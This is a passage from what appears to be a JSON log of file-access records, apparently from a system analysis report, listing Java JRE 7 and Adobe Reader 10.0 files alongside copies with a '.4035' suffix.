(x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\client\\classes.jsa.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\client\\classes.jsa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\abcpy.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\abcpy.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\data1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\data1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT.4035", "hashes": [], "norm_filename": "c:\\program files 